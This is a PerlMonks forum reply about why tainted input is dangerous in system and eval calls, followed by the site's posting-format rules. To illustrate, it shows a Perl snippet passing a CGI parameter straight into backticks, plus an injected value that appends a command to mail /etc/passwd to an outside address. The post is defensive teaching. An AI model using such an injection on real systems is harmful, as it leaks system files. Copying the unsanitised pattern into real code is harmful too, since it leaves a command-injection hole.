Bit like mounting a paper shreader in your letterbox as
defence against junk mail! system and eval calls are some of the
more obvious places that tainted or untrustworthy data can cause havoc.
For example, if you were blindly running
my $cmd = '/usr/bin/file ' . $q->param('object');
my $mimetype = `$cmd`;
To check the mime type of a given object, of course some clown could then supply the object param as
/my/dummy/object; cat /etc/passwd | mail crakd@your.boxen.com
Which would probably not give your script too much trouble, but possibly email /etc/passwd to
somewhere it should not be.
Writing to a database without untainting input can also create grief, try removing an LDAP entry that has
an equals sign '=' as the first character of it's CN "accidentally" inserted
I can't believe it's not psellchecked
Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
Read Where should I post X? if you're not absolutely sure you're posting in the right place.
Please read these before you post! —
Posts may use any of the Perl Monks Approved HTML tags:
- a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
| |
For: |
|
Use: |
| & | | & |
| < | | < |
| > | | > |
| [ | | [ |
| ] | | ] |
Link using PerlMonks shortcuts! What shortcuts can I use for linking?
See Writeup Formatting Tips and other pages linked from there for more info.